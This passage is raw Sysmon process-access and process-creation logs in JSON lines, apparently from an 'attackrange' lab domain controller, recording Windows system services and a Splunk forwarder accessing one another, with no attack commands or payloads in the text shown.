C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3443,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3444,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3445,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-001024710500}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-001024710500}","TargetProcessId":"4148","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3446,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3447,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.417\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nProcessId: 1828\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.417","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3448,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3449,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3450,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.414\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.414","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\